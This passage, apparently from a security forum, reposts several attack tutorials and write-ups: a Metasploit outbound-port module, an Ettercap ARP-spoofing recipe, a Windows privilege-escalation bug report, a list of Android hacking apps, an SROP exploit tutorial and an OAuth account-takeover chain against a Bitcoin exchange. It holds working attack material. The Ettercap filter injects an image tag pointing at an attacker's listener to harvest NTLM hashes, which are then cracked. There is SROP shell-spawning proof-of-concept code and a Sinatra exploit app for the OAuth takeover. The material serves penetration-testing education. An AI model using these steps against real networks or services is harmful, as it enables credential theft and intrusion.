so if your host receives a SYN/ACK you can deduce that certain port is not filtered. This service is similar to http://portquiz.net which I have used sometimes, usually on linux machines, to know the filtering policies of the organization in which I am doing a pentest. However, I did not like the idea of depending on a particular external service. Moreover, while it would be easy to prepare a machine with a couple of Iptables rules I still found it a bit cumbersome. After shuffling some options, I ended up creating the outbound_ports.rb module for Windows which does not depend on any service or external configuration. The module is a kind of traceroute using TCP packets with incremental TTL values. The idea is to launch a TCP connection to a public IP (this IP does not need to be under your control) with a low TTL value. As a result of the TTL some intermediate device will return an ICMP "TTL exceeded" packet. If the victim host is able to read that ICMP packet we can infer that the port used is not filtered. By default, the TTL will start with a value of 1 although this can be changed with the parameter MIN_TTL. With HOPS we indicate the number of peers to get. Personally I tend to use a low value since all I need is to get an ICMP response from a public IP. The module will also have the TIMEOUT parameter to set the waiting time of the ICMP socket. In the following example I've used the public IP 208.84.244.10 to check if the outbound connection to ports 443 and 8080 are filtered. As shown, we have obtained several ICMP replies from different routers; so now we know that those ports would be good candidates for our reverse shell. You can play around with the HOPS and MIN_TTL options. For example, if you do not want to create so much noise you can set an initial TTL of 3 and set the number of hops to 1. In that case, and unless the organization has a complex network, you could receive a quick response from an external IP. Another alternative is to set the STOP option to true. Thus, when a public IP responds with an ICMP packet, the script will not continue launching more connections. As you can tell, the module will also be useful to infer the network topology of our target; working in the same way that a "traceroute". Internally, the module will use two sockets, first a TCP socket in non-blocking mode. This socket will be in charge of launching SYN packets with different TTL values (set with the setsockopt API and the IP_TTL option). On the other hand, a raw ICMP socket will be needed to read the ICMP responses. Since Window's firewall blocks this type of packets by default the module will use netsh to allow incoming ICMP traffic. For now the module is under review. The module is already included in Metasploit. Posted by Borja Merino at 12:26 PM Sursa: Shell is coming ...: Metasploit: Getting outbound filtering rules by tracerouting
-
You can probably get by with leaving off that last part of the title and still succeed with this attack. Today we will be making a Password Pwn Stew. Add a little Ettercap (link), with a dash of Metasploit (link), a smidgen of password cracking with Rcrack (link) and Rainbowtables (link), and if required a pinch of Hashcat (link) to taste. You will have yourself some tasty pwnage. Note, your mileage may vary with this stew. I’m not Martha Stewart. Also the stew analogy ends here The latest version of Kali Linux includes the most current version of Ettercap (0.8.0). But if you like installing from scratch then see Compiling and Installing Ettercap. The latest version of Kali Linux includes the most current version of Metasploit. But if you like installing from scratch then visit the Metasploit Github page on setting up the development environment. You only need to follow the sections titled Apt-Get Install, Getting Ruby, Working with Git (ignore the forking part), Bundle install, and Configure your database. The latest version of Kali Linux includes the most current version of rcracki_mt. You could also follow this quick tutorial to get rcracki_mt binary. You will also need to download the HALMLMCHALL rainbowtables so visit that same tutorial. The latest version of Kali Linux includes an outdated version of HashCat. HashCat is free but not open source. You can download the latest binary from oclHashcat - advanced password recovery. You will need to download current video drivers for this version of HashCat. The following commands will work for Ubuntu 13.10 with an Nvidia card. sudo add-apt-repository ppa:xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-331 nvidia-settings-331 Now we have all our ingredients. Sorry, promised the analogy would end. Let’s Get To It! What we will accomplish is the Address Resolution Protocol (ARP) spoofing of a local network segment, inject HTML traffic whenever a user surfs the Internet/Intranet, and force clients to request a Server Message Block (SMB) authentication back to a Metasploit listener that will force authentication with a known challenge request. With a known challenge, and if LanManager is still enabled in the environment (Windows XP clients) then a Rainbowtable can be used to identify the first 7 characters of the password. The remainder can be brute forced. If only NTLM or NTLMv2 is used you still have a hash that you can dictionary attack or bruteforce, preferably with a cracker that takes advantage of your graphics card i.e. oclHashCat. Setting Up Metasploit SMB Server # service smbd stop smbd stop/waiting # /opt/metasploit-framework/msfconsole msf > use auxiliary/server/capture/smb msf auxiliary(smb) > set JOHNPWFILE /tmp/john JOHNPWFILE => /tmp/john msf auxiliary(smb) > run [*] Auxiliary module execution completed [*] Server started. msf auxiliary(smb) > ARP Spoofing and Packet Filtering with Ettercap Note that when conducting ARP spoofing you will negatively impact the network traffic if you just spoof every host. Make your attack targeted so it does not raise any red flags or effect network performance. While this is outside the scope of this article you may want to target the workstations of any Windows Administrators to obtain their hash…for obvious reasons. Before we start Ettercap we need to construct a filter to parse the HTTP (port 80) traffic and inject a link back to our Metasploit listener. There are links at the bottom to the resources I used to create the filter and learn about how filtering works in Ettercap. Open your favorite text editor and paste the code below. # vim http-img.filter if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("<\/body", "<img src=\"\\\\<Metasploit_Listener_IP_Address>\\pixel.gif\"><\/body "); msg("Filter Ran 4.\n"); Once the file is saved you will use an Ettercap command to convert the code into the binary Ettercap will understand. # etterfilter http-img.filter -o http-img.ef etterfilter 0.8.0 copyright 2001-2013 Ettercap Development Team 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file 'http-img.filter' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'http-img.ef' done. -> Script encoded into 15 instructions. Copy the binary to the Ettercap share folder. #copy http-img.ef /usr/share/ettercap (may be /usr/local/share/ettercap) If you know your target you can start Ettercap from the command-line to begin sniffing, ARP Spoof, and filtering the traffic. # ettercap -TqF http-img.ef -M arp:remote /<target_ip(s)>/ /<gatewayIP>/ -i eth0 If you prefer the GUI then follow the screenshots found here. This screenshot shows Ettercap when the filter modifies the traffic. Below is an example capture of the SMB authentication in Metasploit msf auxiliary(smb) > [*] SMB Captured - Fri Jan 17 22:14:51 -0500 2014 NTLMv2 Response Captured from 192.168.0.108:1282 - 192.168.0.108 USER:Owner DOMAIN:COMPUTER-2554 OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:09af7e143207525cfc17e4037a1f0a54 NT_CLIENT_CHALLENGE:0101000000000000205e4972fb13cf01547f10c301861ef800000000020000000000000000000000 The last step we need to accomplish is crack the hash obtained. The example above has LMHASHing disabled. For demonstration purposes we will utilize LM and NTLM hashes captured during an actual penetration test. One of the Metasploit options we set was JOHNPWFILE. This saves all hashes obtained in the format John the Ripper uses to crack passwords. It is also the format used by oclHashCat. But before we use any offline bruteforce tools we will demonstrate cracking NetLM using the example below. The username and domain have been removed to protect the guilty. Username::WINDOWSDOMAIN:<b>1d006cfe2f3a9f72</b>ce4894c546c4beea53032ef5db28da08:b528f7d46e130e678c2e65a656b76b685f8dad9152d02c3f:1122334455667788 We will use rcracki_mt and the HALFLMCHALL rainbowtable to crack the first 7 characters of the password. This requires the first 16 digits of the NetLM hash – 1d006cfe2f3a9f72 # cd ~/tools/rcracki_mt_0.7.0_linux_x86_64 ~/tools/rcracki_mt_0.7.0_linux_x86_64# # ./rcracki_mt /media/edge/3TB/Passwords/Rainbow/HalfLM/*.rti -h 1d006cfe2f3a9f72 Using 1 threads for pre-calculation and false alarm checking... Found 4 rainbowtable files... halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p]_0.rti reading index... 13528977 bytes read, disk access time: 0.00 s reading table... 461190920 bytes read, disk access time: 0.00 s searching for 1 hash... plaintext of 1d006cfe2f3a9f72 is GOOSE00 cryptanalysis time: 0.06 s statistics ------------------------------------------------------- plaintext found: 1 of 1(100.00%) total disk access time: 0.00s total cryptanalysis time: 0.06s total pre-calculation time: 2.34s total chain walk step: 2876401 total false alarm: 31 total chain walk step due to false alarm: 68140 result ------------------------------------------------------- 1d006cfe2f3a9f72 GOOSE00 hex:474f4f53453030 Now to bruteforce the remaining portion of the password using a Ruby script that comes with Metasploit. # cd /opt/metasploit-framework/tools /opt/metasploit-framework/tools# ruby halflm_second.rb -n 1d006cfe2f3a9f72ce4894c546c4beea53032ef5db28da08 -p GOOSE00 [*] Trying one character... [*] Trying two characters (eta: 12.858231544494629 seconds)... [*] Cracked: GOOSE004# Using the script to brute force up to 3 characters is about as far as you want to go with the halflm_second.rb script as you see in the example below. That is a ten character password which is not too shabby. As you see below a longer password will not be cracked in a reasonable amount of time. Especially if you are on a penetration test with a limited testing window. Username2:WINDOWSDOMAIN:1c6e27fb87220408930041fca2d43260f3831c004b1486d8:eab0974cad5cf20ab14e0d264865973bbffc0e5ca4725e33:1122334455667788 /opt/metasploit-framework/tools# ruby halflm_second.rb -n 1c6e27fb87220408930041fca2d43260f3831c004b1486d8 -p RYANCHI [*] Trying one character... [*] Trying two characters (eta: 10.010079860687256 seconds)... [*] Trying three characters (eta: 2292.3082880973816 seconds)... [*] Trying four characters (eta: 524938.5979743004 seconds)... An eleven (11) character password will take 6.075 days. I have no idea how long a 12 character password would take but know that it is exponentially longer and not even scripted into halflm_second.rb . So oclHashcat and GPU password cracking to the rescue! To continue the saga visit this tutorial on using Hashcat to bruteforce the second half of the password. Great sites to learn about Ettercap Filtering Fun with Ettercap Filters "Invincibility lies in the defence; the possibility of victory in the attack" by Sun Tzu: More On Ettercap plus Filter examples ETTERCAP - The Easy Tutorial - Man in the middle attacks Sursa: Password Pwn Stew – Ettercap, Metasploit, Rcrack, HashCat, and Your Mom » jedge.com Information Security
-
- 1
-
-
Reported by fors.. @google.com, Oct 13, 2014 Platform: Windows 8.1 Update 32/64 bit (No other OS tested) When a user logs into a computer the User Profile Service is used to create certain directories and mount the user hives (as a normal user account cannot do so). In theory the only thing which needs to be done under a privileged account (other than loading the hives) is creating the base profile directory. This should be secure because c:\users requires administrator privileges to create. The configuration of the profile location is in HKLM so that can’t be influenced. However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the user’s token, but this changes to impersonating Local System part of the way through. Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs everytime the user logs in to their account, it isn't something that only happens during the initial provisioning of the local profile. Some identified issues are: * When creating directories the service does a recursive create, so for example if creating c:\users\user it will first create c:\users then c:\users\user. Probably not exploitable because Users already exists but of course worth remembering that normal users can create directories in the c: drive root. So always a possibility being able to place a junction point at c:\users on some systems. * The service creates the temporary folder for the user in CreateTempDirectoryForUser and gets the value from the user’s hive Environment key (TEMP and TMP). This folder is created under system privileges. All it requires is the string starts with %USERPROFILE% so you can do relative paths or just replace USERPROFILE in the environment. This probably isn't that useful on the whole as the security of the directory is inherited from the parent. * Creation of AppData\LocalLow folder in EnsurePreCreateKnownFolders. This might be exploited to set an arbitrary directory’s integrity level to Low as it tries to set the label explicitly. But that’s probably only of interest if there’s a directory which a normal user would be able to write to but is blocked by a high/system integrity level which is unlikely. * Probably most serious is the handling of the %USERPROFILE\AppData\Local\Microsoft\Windows\UsrClass.dat registry hive. The profile service queries for the location of AppData\Local from the user’s registry hive then tries to create the Windows folder and UsrClass.dat file. By creating a new folder structure, changing the user's shell folders registry key and placing a junction in the hierarchy you can get this process to open any other UsrClass.dat file on the system, assuming it isn't already loaded. For example you could create a directory hierarchy like: %USERPROFILE%\AppData\NotLocal\Microsoft\Windows -> c:\users\administrator\appdata\local\Microsoft\windows Then set HKCU\Software\Microsoft\Windows\Explorer\User Shell Folders\Local AppData to %USERPROFILE%\AppData\NotLocal. It seems to even set the root key security when it does so, this might be useful for privilege escalation. This has a chicken-and-egg problem in that the NtLoadKey system call will create the file if it doesn't exist (it sets the FILE_OPEN_IF disposition flag), but you must be running as an administrator otherwise the privilege check for SeRestorePrivilege will fail. I've looked at the implementation on Windows 7 and there are a few similar issues but Windows 8.1 implementation of the services does a lot more things. At least the most serious UsrClass.dat issue exists in 7. Attached is a batch file PoC for Windows 8.1 Update which demonstrates the temporary folder issue. To verify perform the following steps: 1) Execute the batch file as a normal user (this was tested with a local account, not a Microsoft online linked account, or domain). This will change the environment variables TEMP and TMP to be %USERPROFILE%\..\..\..\..\Windows\faketemp 2) Logout then log back in again 3) Observe that the directory \Windows\faketemp has been created. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. [TABLE] [TR] [TD] [/TD] [TD] set_temp.bat 207 bytes View Download[/TD] [/TR] [/TABLE] Sursa: https://code.google.com/p/google-security-research/issues/detail?can=2&q=&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&groupby=&sort=&id=123
-
Here we have in no particular order the top Android apps for hacking using an android smartphone. Disclaimer: These apps should be used for research purposes only 1. SpoofApp:- SpoofApp is a Caller ID Spoofing, Voice Changing and Call Recording mobile app for your iPhone, BlackBerry and Android phone. It’s a decent mobile app to help protect your privacy on the phone. However, it has been banned from the Play Store for allegedly being in conflict with The Truth in Caller ID Act of 2009. 2. Andosid:- The DOS tool for Android Phones allows security professionals to simulate a DOS attack (an http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. 3.Faceniff:- Allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks. 4.Nmapper:- (Network Mapper) is a security scanner originally written by Gordon Lyon used to discover hosts and services on a computer network, thus creating a “map” of the network. To accomplish its goal, Nmapper sends specially crafted packets to the target host and then analyses the responses. 5. Anti-Android Network Toolkit:- zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety. 6. SSHDroid:- SSHDroid is a SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “adb shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc). 7. WiFi Analyser:- Turns your android phone into a Wi-Fi analyser. Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router. 8. Network Discovery:- Discover hosts and scan their ports in your Wifi network. A great tool for testing your network security. 9. ConnectBot:- ConnectBot is a powerful open-source Secure Shell (SSH) client. It can manage simultaneous SSH sessions, create secure tunnels, and copy/paste between other applications. This client allows you to connect to Secure Shell servers that typically run on UNIX-based servers. 10. dSploit:-Android network analysis and penetration suite offering the most complete and advanced professional toolkit to perform network security assesments on a mobile device. 11. Hackode:- The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc. 12.Androrat:- Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server. 13.APKInspector:- APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. 14.DroidBox:- DroidBox is developed to offer dynamic analysis of Android applications. 15.Burp Suite:- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. 16. Droid Sheep:- DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service. 17. AppUse:– Android Pentest Platform Unified Standalone Environment:- AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs. 18. Shark for Root:- Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump. 19. Fing:- Find out which devices are connected to your Wi-Fi network, in just a few seconds. Fast and accurate, Fing is a professional App for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues. 20.Drozer:- drozer enables you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps’ IPC endpoints and the underlying OS. drozer provides tools to help you use and share public Android exploits. It helps you to deploy a drozer agent by using weasel – MWR’s advanced exploitation payload. 21. WifiKill:- Second app, developed also by B.Ponury is an app which can kill connections and kick site-hoggers from the site. This app definitely kick then net user from the site so he cannot use it anymore. The app also offers the list of viewed sites by the hogger. 22. DroidSniff:- Similar to DroidSheep but with a newer and nicer interface is DroidSniff – sniffing app not only for Facebook. This app shows you what is the hogger looking for and then you can “take” his control, steal the cookies and rock’n’roll. Works perfectly. 23. Network Spoofer:- The last app, called NetWork Spoofer is very similar to dSploit but it’s more easier to use. Only hitch is that you need to have at least 500MB of free data. It offers you a lot of troll features – change Google searches, flip images, redirect websites, swap YouTube videos and others. 24. Droid SQLI:- allows you to test your MySQL based web application against SQL injection attacks. DroidSQLi supports the following injection techniques: Time based injection, blind injection, error based injection, normal injection. 25. sqlmapchik:- is a cross-platform sqlmap GUI for the extremely popular sqlmap tool Sursa: The Top Android Apps for Hacking
-
January 3, 2015 — Mehdi Talbi Playing with signals : An overview on Sigreturn Oriented Programming Introduction Back to last GreHack edition, Herbert Bos has presented a novel technique to exploit stack-based overflows more reliably on Linux. We review hereafter this new exploitation technique and provide an exploit along with the vulnerable server. Even if this technique is portable to multiple platforms, we will focus on a 64-bit Linux OS in this blog post. All sample code used in this blogpost is available for download through the following archive. We’ve got a signal When the kernel delivers a signal, it creates a frame on the stack where it stores the current execution context (flags, registers, etc.) and then gives the control to the signal handler. After handling the signal, the kernel calls sigreturn to resume the execution. More precisely, the kernel uses the following structure pushed previously on the stack to recover the process context. A closer look at this structure is given by figure 1. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8[/TD] [TD=class: code]typedef struct ucontext { unsigned long int uc_flags; struct ucontext *uc_link; stack_t uc_stack; mcontext_t uc_mcontext; __sigset_t uc_sigmask; struct _libc_fpstate __fpregs_mem; } ucontext_t;[/TD] [/TR] [/TABLE] Now, let’s debug the following program (sig.c) to see what really happens when handling a signal on Linux. This program simply registers a signal handler to manage SIGINT signals. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18[/TD] [TD=class: code]#include <stdio.h> #include <signal.h> void handle_signal(int signum) { printf("handling signal: %d\n", signum); } int main() { signal(SIGINT, (void *)handle_signal); printf("catch me if you can\n"); while(1) {} return 0; } /* struct definition for debugging purpose */ struct sigcontext sigcontext;[/TD] [/TR] [/TABLE] First of all, we need to tell gdb to not intercept this signal: [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]gdb$ handle SIGINT nostop pass Signal Stop Print Pass to program Description SIGINT No Yes Yes Interrupt[/TD] [/TR] [/TABLE] Then, we set a breakpoint at the signal handling function, start the program and hit CTRLˆC to reach the signal handler code. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14[/TD] [TD=class: code]gdb$ b handle_signal Breakpoint 1 at 0x4005a7: file sig.c, line 6. gdb$ r Starting program: /home/mtalbi/sig hit CTRL^C to catch me ^C Program received signal SIGINT, Interrupt. Breakpoint 1, handle_signal (signum=0x2) at sig.c:6 6 printf("handling signal: %d", signum); gdb$ bt #0 handle_signal (signum=0x2) at sig.c:6 #1 <signal handler called> #2 main () at sig.c:13[/TD] [/TR] [/TABLE] We note here that the frame #1 is created in order to resume the process execution at the point where it was interrupted before. This is confirmed by checking the instructions pointed by rip which corresponds to sigreturn syscall: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]gdb$ frame 1 #1 <signal handler called> gdb$ x/2i $rip => 0x7ffff7a844f0: mov $0xf,%rax 0x7ffff7a844f7: syscall [/TD] [/TR] [/TABLE] Figure 1 shows the stack at signal handling function entry point. Figure 1: Stack at signal handling function entry point We can check the values of some saved registers and flags. Note that sigcontext structure is the same as uc_mcontext structure. It is located at rbp + 7 * 8 according to figure 1. It holds saved registers and flags value: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12[/TD] [TD=class: code]gdb$ frame 0 ... gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->rip $5 = 0x4005da gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->rsp $6 = 0x7fffffffe110 gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->rax $7 = 0x17 gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->cs $8 = 0x33 gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->eflags $9 = 0x202[/TD] [/TR] [/TABLE] Now, we can verify that after handling the signal, registers will recover their values: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15[/TD] [TD=class: code]gdb$ b 13 Breakpoint 2 at 0x4005da: file sig.c, line 13. gdb$ c Continuing. handling signal: 2 Breakpoint 2, main () at sig.c:13 13 while(1) {} gdb$ i r ... rax 0x17 0x17 rsp 0x7fffffffe110 0x7fffffffe110 eflags 0x202 [ IF ] cs 0x33 0x33 ...[/TD] [/TR] [/TABLE] Exploitation If we manage to overflow a saved instruction pointer with sigreturn address and forge a uc mcontext structure by adjusting registers and flags values, then we can execute any syscall. It may be a litte confusing here. In effect, trying to execute a syscall by returning on another syscall (sigreturn) may be strange at first sight. Well, the main difference here is that the latter does not require any parameters at all. All we need is a gadget that sets rax to 0xf to run any system call through sigreturn syscall. Gadgets are small pieces of instructions ending with a ret instruction. These gadgets are chained together to perform a specific action. This technique is well-known as ROP: Return-Oriented Programming [sha07]. Surprisingly, it is quite easy to find a syscall ; ret gadget on some Linux distribution where the vsyscall map is still in use. The vsyscall page is mapped at fixed location into all user-space processes. For interested readers, here is good link about vsyscall. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]mtalbi@mtalbi:/home/mtalbi/srop$ cat /proc/self/maps ... 7ffffe5ff000-7ffffe600000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ... gdb$ x/3i 0xffffffffff600000 0xffffffffff600000: mov rax,0x60 0xffffffffff600007: syscall 0xffffffffff600009: ret [/TD] [/TR] [/TABLE] Bosman and Bos list in [bB14] locations of sigreturn and syscall gadgets for different operating systems including FreeBSD and Mac OS X. Assumed that we found the required gadgets, we need to arrange our payload as shown in figure 3 in order to successfully exploit a classic stack-based overflow. Note that zeroes should be allowed in the payload (e.g. a non strcpy vulnerability); otherwise, we need to find a way to zero some parts of uc_mcontext structure. The following code (srop.c) is a proof of concept of sigreturn oriented programming that starts a /bin/sh shell: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46[/TD] [TD=class: code]#include <stdio.h> #include <string.h> #include <signal.h> #define SYSCALL 0xffffffffff600007 struct ucontext ctx; char *shell[] = {"/bin/sh", NULL}; void gadget(); int main() { unsigned long *ret; /* initializing the context structure */ bzero(&ctx, sizeof(struct ucontext)); /* setting rip value (points to syscall address) */ ctx.uc_mcontext.gregs[16] = SYSCALL; /* setting 0x3b in rax (execve syscall) */ ctx.uc_mcontext.gregs[13] = 0x3b; /* setting first arg of execve in rdi */ ctx.uc_mcontext.gregs[8] = shell[0]; /* setting second arg of execv in rsi */ ctx.uc_mcontext.gregs[9] = shell; /* cs = 0x33 */ ctx.uc_mcontext.gregs[18] = 0x33; /* overflowing */ ret = (unsigned long *)&ret + 2; *ret = (int)gadget + 4; //skip gadget's function prologue *(ret + 1) = SYSCALL; memcpy(ret + 2, &ctx, sizeof(struct ucontext)); return 0; } void gadget() { asm("mov $0xf,%rax\n"); asm("retq\n"); }[/TD] [/TR] [/TABLE] The programm fills a uc_mcontext structure with execve syscall parameters. Additionally, the cs register is set to 0x33: Instruction pointer rip points to syscall; ret gadget. rax register holds execve syscall number. rdi register holds the first paramater of execve (“/bin/sh” address). rsi register holds the second parameter of execve (“/bin/sh” arguments). rdx register holds the last parameter of execve (zeroed at struture initialization). Then, the program overflows the saved rip pointer with mov %rax, $0xf; ret gadget address (added artificially to the program through gadget function). This gadget is followed by the syscall gadget address. So, when the main function will return, these two gadgets will be executed resulting in sigreturn system call which will set registers values from the previously filled structure. After sigreturn, execve will be called as rip points now to syscall gadget and rax holds the syscall number of execve. In our example, execve will start /bin/sh shell. Code In this section we provide a vulnerable server (server.c) and use the SROP technique to exploit it (exploit.c). Vulnerable server The following program is a simple server that replies back with a welcoming message after receiving some data from client. The vulnerability is present in the handle_conn function where we can read more data from client (4096 bytes) than the destination array (input) can hold (1024 bytes). The program is therefore vulnerable to a classical stack-based overflow. server.c Exploit We know that our payload will be copied in a fixed location in .bss. (at 0x6012c0). Our strategy is to copy a shellcode there and then call mprotect syscall in order to change page protection starting at 0x601000 (must be a multiple ot the page size). Figure 2: Payload copied in .bss In this exploit, we overflow our vulnerable buffer as shown by figure 3. First, we fill our buffer with a nop sled (not necessary) followed by a classical bindshell. This executable payload is prepended with an address pointing to the shellcode in .bss (see figure 2). exploit.c Our goal is to change protection of memory page containing our shellcode. More precisely, we want to make the following call so that we can execute our shellcode: [TABLE] [TR] [TD=class: code]mmprotect(0x601000, 4096, PROT_READ | PROT_WRITE | PROT_EXEC);[/TD] [/TR] [/TABLE] Here, is what happens when the vulnerable function returns: The artificial gadget is executed. It sets rax register to 15. Our artificial gadget is followed by a syscall gadget that will result in a sigreturn call. The sigreturn uses our fake uc_mcontext structure to restore registers values. Only non shaded parameters in figure 3 are relevant to the exploit. After this call, rip points to syscall gadget, rax is set to mprotect syscall number, and rdi, rsi and rdx hold the parameters of mprotect function. Additionally, rsp points to our payload in .bss. mprotect syscall is executed. ret instruction of syscall gadget is executed. This instruction will set instruction pointer to the address popped from rsp. This address points to our shellcode (see figure 2). The shellcode is executed. Figure 3: Stack after overflowing input buffer Replaying the exploit The above code has been compiled using gcc (gcc -g -o server.c server) on a Debian Wheezy running on x_86_64 arch. Before reproducing this exploit, you need to adjust first the following addresses: SYSCALL_GADGET [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]mtalbi@mtalbi:/home/mtalbi/srop$ cat /proc/self/maps ... 7ffffe5ff000-7ffffe600000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] ... gdb$ x/3i 0xffffffffff600000 0xffffffffff600000: mov rax,0x60 0xffffffffff600007: syscall 0xffffffffff600009: ret[/TD] [/TR] [/TABLE] RAX_15_GADGET [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10[/TD] [TD=class: code]mtalbi@mtalbi:/home/mtalbi/srop$ gdb server (gdb) disas gadget Dump of assembler code for function gadget: 0x0000000000400acf <+0>: push %rbp 0x0000000000400ad0 <+1>: mov %rsp,%rbp 0x0000000000400ad3 <+4>: mov $0xf,%rax 0x0000000000400ada <+11>: retq 0x0000000000400adb <+12>: pop %rbp 0x0000000000400adc <+13>: retq End of assembler dump.[/TD] [/TR] [/TABLE] DATA [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code](gdb) p &data $1 = (char [8192]) 0x6012c0[/TD] [/TR] [/TABLE] References [bB14] Erik Bosman and Herbert Bos. We got signal. a return to portable exploits. (working title, subject to change.). In Security & Privacy (Oakland), San Jose, CA, USA, May 2014. IEEE. [sha07] Hovav Shacham. The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86). In Proceedings of the 14th ACM Conference on Computer and Communications Security, CCS ’07, pages 552– 561, New York, NY, USA, 2007. ACM. Sursa: Playing with signals : An overview on Sigreturn Oriented Programming | This is Security :: by Arkoon-Netasq
-
Hacking a Bitcoin Exchange Jan 10, 2015 • @homakov For a while we’ve been looking for a project to conduct volunteer security audit. Recently we found a perfect suit for us - an open source crypto currency exchange Peatio powered by Rails. We dedicated 8 hours to find a way to do the worst you can do with a Bitcoin exchange - steal the hot wallet. The mission was partially accomplished and we found an interesting chain of critical vulnerabilities. Step 1. Hijacking the account Peatio has “Connect Weibo account” feature built-in. According to OAuth Security Cheatsheet, poorly implemented OAuth is a reliable way to take over an account. Connecting attacker’s weibo account to the victim’s Peatio account omniauth-weibo-oauth2 gem was vulnerable to state fixation. We can set state to arbitrary value (e.g. 123) and apply the attacker’s code instead along with state=123, which will lead to assigning attacker’s weibo to victim’s peatio account. The exact same issue was in omniauth-facebook gem and others omniauth-based libraries copypasting same vulnerable code. It’s funny that the comment above says “to support omniauth-oauth2’s auto csrf protection” but does the opposite and switches it off. The bug can be exploited with following Sinatra app, just add YourWeiboCookies: require 'sinatra' get '/get_weibo_cb' do conn = Faraday.new(:url => 'https://api.weibo.com') new_url = conn.get do |r| r.url "/oauth2/authorize?client_id=456519107&redirect_uri=https%3A%2F%2Fyunbi.com%2Fauth%2Fweibo%2Fcallback&response_type=code&state=123" r.headers['Cookie'] =<<COOKIE YourWeiboCookies COOKIE r.options.timeout = 4 r.options.open_timeout = 2 end.headers["Location"] redirect new_url end get '/peatio_demo' do response.headers['Content-Security-Policy'] = "img-src 'self' https://yunbi.com" "<img src='https://yunbi.com/auth/weibo?state=123'><img src='/get_weibo_cb'>" end What if the user already has Weibo connected? The system is not going to connect another Weibo account but we wanted the exploit to work seamlessly for every possible victim. So we hacked Weibo’s OAuth. First, we found out Weibo doesn’t whitelist redirect_uri like Github didn’t. It’s possible to change redirect_uri to another page on the victim domain to leak the code in the Referrer header and then use it to log in victim’s account. However there was no such page on Peatio to make it leak. No external images, links or anything. The attack surface was so tiny. But then we found this in DocumentsController: if not @DOC redirect_to(request.referer || root_path) return end Following chain of redirects leaks the code by putting it in the # fragment first. attacker_page redirects to weibo.com/authorize?...redirect_uri=http://app/documents/not_existing_doc%23... Weibo doesn’t properly parse redirect_uri and redirects the victim to http://app/documents/not_existing_doc#?code=VALID_CODE Peatio cannot find not_existing_doc and sends back Location header equal request.referer which is still attacker_page (the browser retains this header while gets redirected) The browser preserves #?code=VALID_CODE fragment and loads attacker_page#?code=VALID_CODE. Now the code can be leaked with JS via location.hash variable. The code can be used against http://app/auth/weibo/callback to log in the victim’s account. So using two bugs above we can 